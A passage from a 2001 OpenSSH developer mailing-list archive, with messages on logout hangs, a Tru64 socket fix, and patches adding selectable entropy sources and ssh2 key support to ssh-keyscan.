wanted to make sure it wasn't seen by someone. -- albert chin (china at thewrittenword.com) From bowman at math.ualberta.ca Sun Jun 10 02:15:20 2001 From: bowman at math.ualberta.ca (John Bowman) Date: 9 Jun 2001 16:15:20 -0000 Subject: Defect: OpenSSH hangs on logout Message-ID: <20010609161520.11322.qmail@wizard.math.ualberta.ca> > I'm using Linux on two machines and I get this problem > fairly often (when I'm logged on for more than 6 > hours continuously). Under Linux, a patch already exists for the hang-on-exit bug (without data loss side affects). See http://www.math.ualberta.ca/imaging/snfs/ -- John Bowman University of Alberta http://www.math.ualberta.ca/~bowman From markus.friedl at informatik.uni-erlangen.de Sat Jun 9 22:27:39 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 9 Jun 2001 14:27:39 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from qralston+ml.openssh-unix-dev@andrew.cmu.edu on Fri, Jun 08, 2001 at 05:36:12PM -0400 References: Message-ID: <20010609142739.A29124@folly> On Fri, Jun 08, 2001 at 05:36:12PM -0400, James Ralston wrote: > My $0.02: I'd like to see this feature. > > I'm not really concerned with the authorized_keys{,2} entries. Where > I think the feature would be a win is with known_hosts{,2}. My > known_hosts file currently has 50+ entries, and it's a royal PITA to > maintain them. no. i don't think so. for known_hosts you have to scan your net and build a single file of trusted hosts that can be distributed to all client machines. you have to check this file for key changes. checking for new files is much harder than $ diff a b From openssh-unix-dev at mindrot.org Sat Jun 9 22:49:11 2001 From: openssh-unix-dev at mindrot.org (Markus Friedl) Date: Sat, 9 Jun 2001 14:49:11 +0200 Subject: how to specify cipher for ssh client ? In-Reply-To: ; from sunil@redback.com on Fri, Jun 08, 2001 at 11:19:13AM -0700 References: Message-ID: <20010609144911.A6430@folly> On Fri, Jun 08, 2001 at 11:19:13AM -0700, Sunil K. Vallamkonda wrote: > I have: > SSH-1.5-OpenSSH_2.3.1p1 upgrade your software. From webinfo at sententia.nl Sun Jun 10 19:14:32 2001 From: webinfo at sententia.nl (webinfo) Date: Sun, 10 Jun 2001 11:14:32 +0200 Subject: Strange login problem Message-ID: <5.1.0.14.2.20010610111248.00a63aa0@sentlinux> I'm using Redhat 7.1 on several boxes, no problems so far. Except for one box, where I get kicked out immediately, the moment I log in. When I look at the log file it says: Jun 6 22:18:55 myhost sshd[7782]: Accepted password for ROOT from x.x.x.x port 62004 ssh2 Jun 6 22:18:56 myhost sshd[7782]: fatal: session_input_channel_req: channel 0: no session Normally, after like three log in attempts, I am able to log in. Can anyone give me some ideas what's going on here? The client i'm using is ssh from security group. Regards, Frans. From urban at UNIX-Beratung.de Sun Jun 10 01:30:22 2001 From: urban at UNIX-Beratung.de (Robert Urban) Date: Sat, 09 Jun 2001 17:30:22 +0200 Subject: fix for getaddrinfo problem on Compaq Tru64 UNIX Message-ID: <200106091530.RAA0000063254@hell.spielwiese.de> Hello OpenSSH Developers, Tru64 V5.1, and probably previous versions, assumes you want 4.3BSD socket behaviour unless 4.4BSD sockets are explicitly requested, which can be done by #defining one of "_SOCKADDR_LEN" or "_XOPEN_SOURCE_EXTENDED". Probably #defining "_SOCKADDR_LEN" has less consequences. 4.3BSD socket behaviour means that getaddrinfo returns sockaddr structs where sa_family is set to zero, which causes subsequent calls to getnameinfo to barf. Any chance you can take this into consideration in "configure"? thanks, Rob Urban From markus.friedl at informatik.uni-erlangen.de Sun Jun 10 21:04:37 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sun, 10 Jun 2001 13:04:37 +0200 Subject: Defect: OpenSSH hangs on logout In-Reply-To: <20010609161520.11322.qmail@wizard.math.ualberta.ca>; from bowman@math.ualberta.ca on Sat, Jun 09, 2001 at 04:15:20PM -0000 References: <20010609161520.11322.qmail@wizard.math.ualberta.ca> Message-ID: <20010610130437.A7660@folly> however, i'd like to point out that this patch is not recommended. it's very likely that it leads to data loss. On Sat, Jun 09, 2001 at 04:15:20PM -0000, John Bowman wrote: > > I'm using Linux on two machines and I get this problem > > fairly often (when I'm logged on for more than 6 > > hours continuously). > > Under Linux, a patch already exists for the hang-on-exit bug > (without data loss side affects). See > > http://www.math.ualberta.ca/imaging/snfs/ > > -- John Bowman > University of Alberta > http://www.math.ualberta.ca/~bowman From mouring at etoh.eviladmin.org Mon Jun 11 03:27:37 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sun, 10 Jun 2001 12:27:37 -0500 (CDT) Subject: ssh-keyscan for ssh2 In-Reply-To: Message-ID: Wayne, where is the current status of patch? I know Markus made a few comments on fatal(). Thanks - Ben On Sat, 19 May 2001, Wayne Davison wrote: > On Sat, 19 May 2001, Markus Friedl wrote: > > i think you can overload fatal() with longjmp(). > > Yeah, I was thinking of doing the same thing. I didn't do it earlier > because it means moving fatal() into its own file so that we don't end > up with a duplicate symbol. > > The appended patch changes this, and it also implemented: the change in > option parsing to support -T timeout and -t rsa1,dsa,rsa; the new -v > option (for verbose logging); the other changes suggested on the list (I > think I got them all). > > Since the patches were getting heavily nested, this is back to being > based on the CVS version. > > ** I left off the change to Makefile.in. Just add logfatal.o to the > line right after log.o. ** > > ..wayne.. > From mouring at etoh.eviladmin.org Mon Jun 11 03:49:18 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sun, 10 Jun 2001 12:49:18 -0500 (CDT) Subject: Patch to enable multiple possible sources of entropy In-Reply-To: <20010607125014.A15157@lucent.com> Message-ID: Hmm.. my only complaints about the patch is that seed_rng and init_rng are pretty unreadable due to #ifdef/#end, and that I don't know if I like the idea of ssh/sshd stepping down in entropy quality on a whim. Which is what this patch would do if for some odd reason prngd is offline at startup of sshd/ssh. - Ben On Thu, 7 Jun 2001, Dave Dykstra wrote: > I have a need to have the same OpenSSH binaries run on multiple machines > which are administered by different people. That means on Solaris, for > example, there will be some with /dev/random, some on which I can run prngd > because they'll be installing my binaries as root, and some which will have > neither because they will be only installed as non-root. Below is a patch > to enable choosing all 3 possible sources at compile time, with the > available source selected at run time. If no configure parameters are > given, it will still determine the entropy source at compile time and only > the code for the one type, exactly as it does today. The patch adds a > configure option called --with-builtin-entropy. > > I have tested this in all possible combinations of entropy sources, and on > 6 different flavors of Unix (linux, solaris, sunos4, hpux, irix, and > unixware1). The patch is against 2.9p1 but applies cleanly to the current > CVS. Please accept this patch into the openssh code base. Don't forget to > run autoheader and autoconf. > > - Dave Dykstra > > *** entropy.c.O Fri Jun 1 15:52:20 2001 > --- entropy.c Tue Jun 5 17:41:47 2001 > *************** > *** 80,91 **** > # define USE_PRNGD > #endif > > - #if defined(USE_PRNGD) || defined(RANDOM_POOL) > - > #ifdef USE_PRNGD > /* Collect entropy from PRNGD/EGD */ > int > ! get_random_bytes(unsigned char *buf, int len) > { > int fd; > char msg[2]; > --- 80,89 ---- > # define USE_PRNGD > #endif > > #ifdef USE_PRNGD > /* Collect entropy from PRNGD/EGD */ > int > ! prngd_get_random_bytes(unsigned char *buf, int len) > { > int fd; > char msg[2]; > *************** > *** 100,110 **** > --- 98,110 ---- > memset(&addr, '\0', sizeof(addr)); > > #ifdef PRNGD_PORT > + debug2("Opening entropy socket on localhost port %d", PRNGD_PORT); > addr.sin_family = AF_INET; > addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); > addr.sin_port = htons(PRNGD_PORT); > addr_len = sizeof(struct sockaddr_in); > #else /* use IP socket PRNGD_SOCKET instead */ > + debug2("Opening entropy socket at %s", PRNGD_SOCKET); > /* Sanity checks */ > if (sizeof(PRNGD_SOCKET) > sizeof(addr.sun_path)) > fatal("Random pool path is too long"); > *************** > *** 179,192 **** > close(fd); > return(rval); > } > ! #else /* !USE_PRNGD */ > #ifdef RANDOM_POOL > /* Collect entropy from /dev/urandom or pipe */ > int > ! get_random_bytes(unsigned char *buf, int len) > { > int random_pool; > > random_pool = open(RANDOM_POOL, O_RDONLY); > if (random_pool == -1) { > error("Couldn't open random pool \"%s\": %s", > --- 179,194 ---- > close(fd); > return(rval); > } > ! #endif /* !USE_PRNGD */ > ! > #ifdef RANDOM_POOL > /* Collect entropy from /dev/urandom or pipe */ > int > ! pool_get_random_bytes(unsigned char *buf, int len) > { > int random_pool; > > + debug2("Opening random pool at %s", RANDOM_POOL); > random_pool = open(RANDOM_POOL, O_RDONLY); > if (random_pool == -1) { > error("Couldn't open random pool \"%s\": %s", > *************** > *** 206,242 **** > return(1); > } > #endif /* RANDOM_POOL */ > - #endif /* USE_PRNGD */ > - > - /* > - * Seed OpenSSL's random number pool from Kernel random number generator > - * or PRNGD/EGD > - */ > - void > - seed_rng(void) > - { > - unsigned char buf[32]; > - > - debug("Seeding random number generator"); > - > - if (!get_random_bytes(buf, sizeof(buf))) { > - if (!RAND_status()) > - fatal("Entropy collection failed and entropy exhausted"); > - } else { > - RAND_add(buf, sizeof(buf), sizeof(buf)); > - } > - > - memset(buf, '\0', sizeof(buf)); > - } > - > - void > - init_rng(void) > - { > - check_openssl_version(); > - } > - > - #else /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ > > /* > * FIXME: proper entropy estimations. All current values are guesses > * FIXME: (ATL) do estimates at compile time? > --- 208,215 ---- > return(1); > } > #endif /* RANDOM_POOL */ > > + #ifdef USE_BUILTIN_ENTROPY > /* > * FIXME: proper entropy estimations. All current values are guesses > * FIXME: (ATL) do estimates at compile time? > *************** > *** 834,840 **** > * syscalls and program output > */ > void > ! seed_rng(void) > { > mysig_t old_sigchld_handler; > > --- 807,813 ---- > * syscalls and program output > */ > void > ! prng_seed_rng(void) > { > mysig_t old_sigchld_handler; > > *************** > *** 860,871 **** > } > > void > ! init_rng(void) > { > int original_euid; > > - check_openssl_version(); > - > original_uid = getuid(); > original_euid = geteuid(); > > --- 833,842 ---- > } > > void > ! prng_init_rng(void) > { > int original_euid; > > original_uid = getuid(); > original_euid = geteuid(); > > *************** > *** 912,915 **** > prng_initialised = 1; > } > > ! #endif /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ > --- 883,979 ---- > prng_initialised = 1; > } > > ! #endif /* USE_BUILTIN_ENTROPY */ > ! > ! #define BUILTIN_SOURCE 1 > ! #define PRNGD_SOURCE 2 > ! #define POOL_SOURCE 3 > ! > ! static int seed_source = 0; > ! > ! void > ! init_rng(void) > ! { > ! check_openssl_version(); > ! > ! #ifdef RANDOM_POOL > ! #if !defined(USE_PRNGD) && !defined(USE_BUILTIN_ENTROPY) > ! seed_source = POOL_SOURCE; > ! #else > ! if (access(RANDOM_POOL, R_OK) == 0) { > ! seed_source = POOL_SOURCE; > ! return; > ! } > ! #endif > ! #endif /* RANDOM_POOL */ > ! > ! /* it's not trivial to probe for an open port so just make it > ! * take priority over the other sources if it is defined > ! */ > ! #ifdef PRNGD_PORT > ! seed_source = PRNGD_SOURCE; > ! #else > ! > ! #ifdef PRNGD_SOCKET > ! #ifndef USE_BUILTIN_ENTROPY > ! seed_source = PRNGD_SOURCE; > ! #else > ! if (access(PRNGD_SOCKET, R_OK) == 0) { > ! seed_source = PRNGD_SOURCE; > ! return; > ! } > ! #endif /* USE_BUILTIN_ENTROPY */ > ! #endif /* PRNGD_SOCKET */ > ! > ! #ifdef USE_BUILTIN_ENTROPY > ! seed_source = BUILTIN_SOURCE; > ! prng_init_rng(); > ! #endif > ! > ! #endif /* PRNGD_PORT */ > ! > ! if (seed_source == 0) > ! fatal("Couldn't find source for random number generator seed"); > ! } > ! > ! /* > ! * Seed OpenSSL's random number pool > ! */ > ! void > ! seed_rng(void) > ! { > ! unsigned char buf[32]; > ! int ret; > ! > ! debug("Seeding random number generator"); > ! > ! switch (seed_source) { > ! #ifdef USE_BUILTIN_ENTROPY > ! case BUILTIN_SOURCE: > ! prng_seed_rng(); > ! return; > ! #endif > ! #ifdef USE_PRNGD > ! case PRNGD_SOURCE: > ! ret = prngd_get_random_bytes(buf, sizeof(buf)); > ! break; > ! #endif > ! #ifdef RANDOM_POOL > ! case POOL_SOURCE: > ! ret = pool_get_random_bytes(buf, sizeof(buf)); > ! break; > ! #endif > ! } > ! > ! #if defined(USE_PRNGD) || defined(RANDOM_POOL) > ! if (!ret) { > ! if (!RAND_status()) > ! fatal("Entropy collection failed and entropy exhausted"); > ! } else { > ! RAND_add(buf, sizeof(buf), sizeof(buf)); > ! } > ! > ! memset(buf, '\0', sizeof(buf)); > ! #endif > ! } > ! > *** configure.in.O Mon Jun 4 12:25:12 2001 > --- configure.in Thu Jun 7 13:37:09 2001 > *************** > *** 1334,1340 **** > ] > ) > > ! # Check for PRNGD/EGD pool file > AC_ARG_WITH(prngd-port, > [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], > [ > --- 1334,1340 ---- > ] > ) > > ! # Check for PRNGD/EGD pool port request > AC_ARG_WITH(prngd-port, > [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], > [ > *************** > *** 1349,1354 **** > --- 1349,1357 ---- > AC_ARG_WITH(prngd-socket, > [ --with-prngd-socket=FILE read entropy from PRNGD/EGD socket FILE (default=/var/run/egd-pool)], > [ > + if test ! -z "$PRNGD_PORT" ; then > + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-prngd-socket]) > + fi > if test "x$withval" != "xno" ; then > PRNGD_SOCKET="$withval" > AC_DEFINE_UNQUOTED(PRNGD_SOCKET, "$PRNGD_SOCKET") > *************** > *** 1375,1385 **** > ] > ) > > > # detect pathnames for entropy gathering commands, if we need them > INSTALL_SSH_PRNG_CMDS="" > rm -f prng_commands > ! if (test -z "$RANDOM_POOL" && test -z "$PRNGD") ; then > # Use these commands to collect entropy > OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) > OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) > --- 1378,1406 ---- > ] > ) > > + # Check for use of builtin entropy collector > + AC_ARG_WITH(builtin-entropy, > + [ --with-builtin-entropy use builtin entropy collector if nothing else available], > + [ > + if test ! -z "$PRNGD_PORT" ; then > + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-builtin-entropy]) > + fi > + BUILTIN_RNG=1 > + ], > + [ > + # Only select by default if don't have another method > + if test -z "$RANDOM_POOL" && test -z "$PRNGD" ; then > + BUILTIN_RNG=1 > + fi > + ] > + ) > > # detect pathnames for entropy gathering commands, if we need them > INSTALL_SSH_PRNG_CMDS="" > rm -f prng_commands > ! if test ! -z "$BUILTIN_RNG" ; then > ! AC_DEFINE(USE_BUILTIN_ENTROPY) > ! > # Use these commands to collect entropy > OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) > OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) > *************** > *** 1885,1901 **** > > # Print summary of options > > ! if test ! -z "$RANDOM_POOL" ; then > ! RAND_MSG="Device ($RANDOM_POOL)" > ! else > ! if test ! -z "$PRNGD_PORT" ; then > ! RAND_MSG="PRNGD/EGD (port localhost:$PRNGD_PORT)" > ! elif test ! -z "$PRNGD_SOCKET" ; then > ! RAND_MSG="PRNGD/EGD (socket $PRNGD_SOCKET)" > else > ! RAND_MSG="Builtin (timeout $entropy_timeout)" > ! BUILTIN_RNG=1 > fi > fi > > # Someone please show me a better way :) > --- 1906,1930 ---- > > # Print summary of options > > ! RAND_MSG="" > ! randmsg() > ! { > ! if test -z "$RAND_MSG" ; then > ! RAND_MSG="$1" > else > ! RAND_MSG="$RAND_MSG or $1" > fi > + } > + if test ! -z "$RANDOM_POOL" ; then > + randmsg "Device ($RANDOM_POOL)" > + fi > + if test ! -z "$PRNGD_PORT" ; then > + randmsg "PRNGD/EGD (port localhost:$PRNGD_PORT)" > + elif test ! -z "$PRNGD_SOCKET" ; then > + randmsg "PRNGD/EGD (socket $PRNGD_SOCKET)" > + fi > + if test ! -z "$BUILTIN_RNG" ; then > + randmsg "Builtin (timeout $entropy_timeout)" > fi > > # Someone please show me a better way :) > *** acconfig.h.O Mon Jun 4 12:42:09 2001 > --- acconfig.h Mon Jun 4 13:53:36 2001 > *************** > *** 95,100 **** > --- 95,103 ---- > /* Port number of PRNGD/EGD random number socket */ > #undef PRNGD_PORT > > + /* Use builtin entropy collector if nothing else available */ > + #undef USE_BUILTIN_ENTROPY > + > /* Builtin PRNG command timeout */ > #undef ENTROPY_TIMEOUT_MSEC > > From wayne at blorf.net Mon Jun 11 07:03:50 2001 From: wayne at blorf.net (Wayne Davison) Date: Sun, 10 Jun 2001 14:03:50 -0700 (PDT) Subject: ssh-keyscan for ssh2 In-Reply-To: <20010607003630.A3268@folly> Message-ID: On Thu, 7 Jun 2001, Markus Friedl wrote: > fatal_add_cleanup(fatal_callback, NULL); I had wanted to also suppress the error, but I suppose that's not strictly necessary. Here's a version of my patch that uses your suggestion for changing the handling of fatal errors, works with the latest changes to the ssh2 connect code, and also updates the ssh-keyscan man page. ..wayne.. -------------- next part -------------- Index: ssh-keyscan.1 --- ssh-keyscan.1 2001/04/19 20:31:02 1.5 +++ ssh-keyscan.1 2001/06/10 20:58:41 @@ -15,14 +15,20 @@ .Nd gather ssh public keys .Sh SYNOPSIS .Nm ssh-keyscan -.Op Fl t Ar timeout -.Op Ar -- | host | addrlist namelist -.Op Fl f Ar files ... +.Op Fl v46 +.Op Fl T Ar timeout +.Op Fl t Ar type +.Op Fl - +.Op Ar host | addrlist namelist +.Op Fl f Ar files +.Ar ... .Sh DESCRIPTION .Nm is a utility for gathering the public ssh host keys of a number of hosts. It was designed to aid in building and verifying .Pa ssh_known_hosts +and +.Pa ssh_known_hosts2 files. .Nm provides a minimal interface suitable for use by shell and perl @@ -47,14 +53,43 @@ have begun after you created your ssh_known_hosts file. .Sh OPTIONS .Bl -tag -width Ds -.It Fl t +.It Fl v +Verbose mode. +Causes +.Nm +to print debugging messages about its progress. +.It Fl 4 +Forces +.Nm +to use IPv4 addresses only. +.It Fl 6 +Forces +.Nm +to use IPv6 addresses only. +.It Fl T Set the timeout for connection attempts. If .Pa timeout seconds have elapsed since a connection was initiated to a host or since the last time anything was read from that host, then the connection is closed and the host in question considered unavailable. Default is 5 seconds. -.It Fl f +.It Fl t Ar type +Specifies the type of the key to fetch from the following hosts. +The possible values are +.Dq rsa1 +for protocol version 1 and +.Dq rsa +or +.Dq dsa +for protocol version 2. +Multiple values may be specified by separating them with commas. +The default is +.Dq rsa1 . +Specifying the +.Pa -t +option again later on the line will change the value for the hostnames that +follow, allowing you to get different key-types from different hosts. +.It Fl f Ar filename Read hosts or .Pa addrlist namelist pairs from this file, one per line. @@ -65,40 +100,68 @@ will read hosts or .Pa addrlist namelist pairs from the standard input. +It is legal to specify multiple +.Pa -f +options and to intermingle them with literal hostnames in any order. .El .Sh EXAMPLES .Pp -Print the host key for machine -.Pa hostname : +Print the +.Pa rsa1 +host key for machine +.Pa host1 +and the +.Pa dsa +host key for machine +.Pa host2 : .Bd -literal -ssh-keyscan hostname +ssh-keyscan host1 -t dsa host2 .Ed .Pp Find all hosts from the file .Pa ssh_hosts which have new or different keys from those in the sorted file -.Pa ssh_known_hosts : +.Pa ssh_known_hosts2 : .Bd -literal -$ ssh-keyscan -f ssh_hosts | sort -u - ssh_known_hosts | \e\ - diff ssh_known_hosts - +$ ssh-keyscan -t rsa,dsa -f ssh_hosts | \e\ + sort -u - ssh_known_hosts2 | diff ssh_known_hosts2 - .Ed .Pp .Sh FILES .Pp .Pa Input format: +.Bd -literal 1.2.3.4,1.2.4.4 name.my.domain,name,n.my.domain,n,1.2.3.4,1.2.4.4 +.Ed .Pp -.Pa Output format: +.Pa Output format for rsa1 keys: +.Bd -literal host-or-namelist bits exponent modulus +.Ed +.Pp +.Pa Output format for rsa and dsa keys: +.Bd -literal +host-or-namelist keytype base64-encoded-key +.Ed +.Pp +Where +.Pa keytype +is either +.Dq ssh-rsa +or +.Dq ssh-dsa . .Pp .Pa /etc/ssh_known_hosts .Sh BUGS It generates "Connection closed by remote host" messages on the consoles -of all the machines it scans. +of all the machines it scans if the server is older than version 2.9. This is because it opens a connection to the ssh port, reads the public key, and drops the connection as soon as it gets the key. .Sh SEE ALSO .Xr ssh 1 , .Xr sshd 8 -.Sh AUTHOR +.Sh AUTHORS David Mazieres +wrote the initial version, and +Wayne Davison +added support for ssh protocol 2. Index: ssh-keyscan.c --- ssh-keyscan.c 2001/03/14 18:37:13 1.26 +++ ssh-keyscan.c 2001/06/10 20:58:42 @@ -19,10 +19,16 @@ #include +#include #include "xmalloc.h" #include "ssh.h" #include "ssh1.h" #include "key.h" +#include "kex.h" +#include "compat.h" +#include "myproposal.h" +#include "packet.h" +#include "dispatch.h" #include "buffer.h" #include "bufaux.h" #include "log.h" @@ -30,7 +36,19 @@ static int argno = 1; /* Number of argument currently being parsed */ -int family = AF_UNSPEC; /* IPv4, IPv6 or both */ +/* Flag indicating whether IPv4 or IPv6. This can be set on the command line. + Default value is AF_UNSPEC means both IPv4 and IPv6. */ +#ifdef IPV4_DEFAULT +int IPv4or6 = AF_INET; +#else +int IPv4or6 = AF_UNSPEC; +#endif + +#define KT_RSA1 1 +#define KT_DSA 2 +#define KT_RSA 4 + +int get_keytypes = KT_RSA1; /* Get only RSA1 keys by default */ #define MAXMAXFD 256 @@ -48,6 +66,8 @@ fd_set *read_wait; size_t read_wait_size; int ncon; +int nonfatal_fatal = 0; +jmp_buf kexjmp; /* * Keep a connection structure for each file descriptor. The state @@ -63,11 +83,13 @@ int c_plen; /* Packet length field for ssh packet */ int c_len; /* Total bytes which must be read. */ int c_off; /* Length of data read so far. */ + int c_keytype; /* Only one of KT_RSA1, KT_DSA, or KT_RSA */ char *c_namebase; /* Address to free for c_name and c_namelist */ char *c_name; /* Hostname of connection for errors */ char *c_namelist; /* Pointer to other possible addresses */ char *c_output_name; /* Hostname of connection for output */ char *c_data; /* Data read from this fd */ + Kex *c_kex; /* The key-exchange struct for ssh2 */ struct timeval c_tv; /* Time at which connection gets aborted */ TAILQ_ENTRY(Connection) c_link; /* List of connections in timeout order. */ } con; @@ -261,8 +283,8 @@ return (tok); } -void -keyprint(char *host, char *output_name, char *kd, int len) +Key * +keygrab_ssh1(con *c) { static Key *rsa; static Buffer msg; @@ -271,12 +293,12 @@ buffer_init(&msg); rsa = key_new(KEY_RSA1); } - buffer_append(&msg, kd, len); - buffer_consume(&msg, 8 - (len & 7)); /* padding */ + buffer_append(&msg, c->c_data, c->c_plen); + buffer_consume(&msg, 8 - (c->c_plen & 7)); /* padding */ if (buffer_get_char(&msg) != (int) SSH_SMSG_PUBLIC_KEY) { - error("%s: invalid packet type", host); + error("%s: invalid packet type", c->c_name); buffer_clear(&msg); - return; + return NULL; } buffer_consume(&msg, 8); /* cookie */ @@ -289,10 +311,54 @@ (void) buffer_get_int(&msg); buffer_get_bignum(&msg, rsa->rsa->e); buffer_get_bignum(&msg, rsa->rsa->n); + buffer_clear(&msg); + + return (rsa); +} + +int +hostjump(Key *hostkey) +{ + longjmp(kexjmp, (int)hostkey); +} + +Key * +keygrab_ssh2(con *c) +{ + int j; - fprintf(stdout, "%s ", output_name ? output_name : host); - key_write(rsa, stdout); + packet_set_connection(c->c_fd, c->c_fd); + enable_compat20(); + myproposal[PROPOSAL_SERVER_HOST_KEY_ALGS] = c->c_keytype == KT_DSA? + "ssh-dss": "ssh-rsa"; + c->c_kex = kex_setup(myproposal); + c->c_kex->check_host_key = hostjump; + + if (!(j = setjmp(kexjmp))) { + nonfatal_fatal = 1; + dispatch_run(DISPATCH_BLOCK, &c->c_kex->done, c->c_kex); + fprintf(stderr, "Impossible! dispatch_run() returned!\n"); + exit(1); + } + nonfatal_fatal = 0; + xfree(c->c_kex); + c->c_kex = NULL; + packet_close(); + if (j < 0) + j = 0; + + return (Key*)(j); +} + +void +keyprint(con *c, Key *key) +{ + if (!key) + return; + + fprintf(stdout, "%s ", c->c_output_name ? c->c_output_name : c->c_name); + key_write(key, stdout); fputs("\n", stdout); } @@ -305,7 +371,7 @@ snprintf(strport, sizeof strport, "%d", SSH_DEFAULT_PORT); memset(&hints, 0, sizeof(hints)); - hints.ai_family = family; + hints.ai_family = IPv4or6; hints.ai_socktype = SOCK_STREAM; if ((gaierr = getaddrinfo(host, strport, &hints, &aitop)) != 0) fatal("getaddrinfo %s: %s", host, gai_strerror(gaierr)); @@ -330,7 +396,7 @@ } int -conalloc(char *iname, char *oname) +conalloc(char *iname, char *oname, int keytype) { int s; char *namebase, *name, *namelist; @@ -359,6 +425,7 @@ fdcon[s].c_data = (char *) &fdcon[s].c_plen; fdcon[s].c_len = 4; fdcon[s].c_off = 0; + fdcon[s].c_keytype = keytype; gettimeofday(&fdcon[s].c_tv, NULL); fdcon[s].c_tv.tv_sec += timeout; TAILQ_INSERT_TAIL(&tq, &fdcon[s], c_link); @@ -378,6 +445,7 @@ if (fdcon[s].c_status == CS_KEYS) xfree(fdcon[s].c_data); fdcon[s].c_status = CS_UNUSED; + fdcon[s].c_keytype = 0; TAILQ_REMOVE(&tq, &fdcon[s], c_link); FD_CLR(s, read_wait); ncon--; @@ -397,21 +465,16 @@ { int ret; con *c = &fdcon[s]; - char *iname, *oname; - iname = xstrdup(c->c_namelist); - oname = xstrdup(c->c_output_name); + ret = conalloc(c->c_namelist, c->c_output_name, c->c_keytype); confree(s); - ret = conalloc(iname, oname); - xfree(iname); - xfree(oname); return (ret); } void congreet(int s) { - char buf[80], *cp; + char buf[256], *cp; size_t bufsiz; int n = 0; con *c = &fdcon[s]; @@ -433,12 +496,27 @@ } *cp = '\0'; fprintf(stderr, "# %s %s\n", c->c_name, buf); - n = snprintf(buf, sizeof buf, "SSH-1.5-OpenSSH-keyscan\r\n"); + if (c->c_keytype != KT_RSA1) { + char remote_version[sizeof buf]; + + if (sscanf(buf, "SSH-%*d.%*d-%[^\n]\n", remote_version) == 1) + compat_datafellows(remote_version); + else + datafellows = 0; + } + n = snprintf(buf, sizeof buf, "SSH-%d.%d-OpenSSH-keyscan\r\n", + c->c_keytype == KT_RSA1? PROTOCOL_MAJOR_1 : PROTOCOL_MAJOR_2, + c->c_keytype == KT_RSA1? PROTOCOL_MINOR_1 : PROTOCOL_MINOR_2); if (atomicio(write, s, buf, n) != n) { error("write (%s): %s", c->c_name, strerror(errno)); confree(s); return; } + if (c->c_keytype != KT_RSA1) { + keyprint(c, keygrab_ssh2(c)); + confree(s); + return; + } c->c_status = CS_SIZE; contouch(s); } @@ -471,7 +549,7 @@ c->c_status = CS_KEYS; break; case CS_KEYS: - keyprint(c->c_name, c->c_output_name, c->c_data, c->c_plen); + keyprint(c, keygrab_ssh1(c)); confree(s); return; break; @@ -539,49 +617,99 @@ nexthost(int argc, char **argv) { static Linebuf *lb; + char *fname, *tname; for (;;) { - if (!lb) { - if (argno >= argc) - return (NULL); - if (argv[argno][0] != '-') - return (argv[argno++]); - if (!strcmp(argv[argno], "--")) { + if (lb) { + char *line; + + line = Linebuf_getline(lb); + if (line) + return (line); + Linebuf_free(lb); + lb = NULL; + } + if (argno >= argc) + return (NULL); + if (argv[argno][0] != '-') + return (argv[argno++]); + while (*++(argv[argno])) { + switch (argv[argno][0]) { + case '-': if (++argno >= argc) return (NULL); return (argv[argno++]); - } else if (!strncmp(argv[argno], "-f", 2)) { - char *fname; - - if (argv[argno][2]) - fname = &argv[argno++][2]; + case 'f': + if (argv[argno][1]) + fname = &argv[argno][1]; else if (++argno >= argc) { error("missing filename for `-f'"); return (NULL); } else - fname = argv[argno++]; + fname = argv[argno]; if (!strcmp(fname, "-")) fname = NULL; lb = Linebuf_alloc(fname, error); - } else + goto double_break; + case 't': + get_keytypes = 0; + tname = &argv[argno][1]; + if (!*tname) { + if (++argno >= argc) { + error("missing types for `-t'"); + return (NULL); + } + tname = argv[argno]; + } + tname = strtok(tname, ","); + while (tname) { + int type = key_type_from_name(tname); + switch (type) { + case KEY_RSA1: + get_keytypes |= KT_RSA1; + break; + case KEY_DSA: + get_keytypes |= KT_DSA; + break; + case KEY_RSA: + get_keytypes |= KT_RSA; + break; + case KEY_UNSPEC: + fatal("unknown key type %s\n", + tname); + } + tname = strtok(NULL, ","); + } + goto double_break; + case '4': + IPv4or6 = AF_INET; + break; + case '6': + IPv4or6 = AF_INET6; + break; + default: error("ignoring invalid/misplaced option `%s'", - argv[argno++]); - } else { - char *line; - - line = Linebuf_getline(lb); - if (line) - return (line); - Linebuf_free(lb); - lb = NULL; + argv[argno]); + goto double_break; + } } +double_break: + argno++; } } void +fatal_callback(void *arg) +{ + if (nonfatal_fatal) + longjmp(kexjmp, -1); +} + +void usage(void) { - fatal("usage: %s [-t timeout] { [--] host | -f file } ...", __progname); + fatal("usage: %s [-v46] [-T timeout] { [-t type] [--] host | -f file } ...", + __progname); return; } @@ -589,6 +717,7 @@ main(int argc, char **argv) { char *host = NULL; + int debug_flag = 0, log_level = SYSLOG_LEVEL_INFO; __progname = get_progname(argv[0]); TAILQ_INIT(&tq); @@ -596,21 +725,46 @@ if (argc <= argno) usage(); - if (argv[1][0] == '-' && argv[1][1] == 't') { - argno++; - if (argv[1][2]) - timeout = atoi(&argv[1][2]); - else { - if (argno >= argc) - usage(); - timeout = atoi(argv[argno++]); + while (argv[argno][0] == '-') { + while (*++(argv[argno])) { + switch (argv[argno][0]) { + case 'T': + if (argv[argno][1]) + timeout = atoi(&argv[argno][1]); + else { + if (++argno >= argc) + usage(); + timeout = atoi(argv[argno]); + } + if (timeout <= 0) + usage(); + goto double_break; + case 'v': + if (!debug_flag) { + debug_flag = 1; + log_level = SYSLOG_LEVEL_DEBUG1; + } + else if (log_level < SYSLOG_LEVEL_DEBUG3) + log_level++; + else + fatal("Too high debugging level."); + break; + default: + if (*--(argv[argno]) != '-') + fatal("Please separate options T and v from any other options."); + goto triple_break; + } } - if (timeout <= 0) - usage(); +double_break: + argno++; } +triple_break: if (argc <= argno) usage(); + log_init("ssh-keyscan", 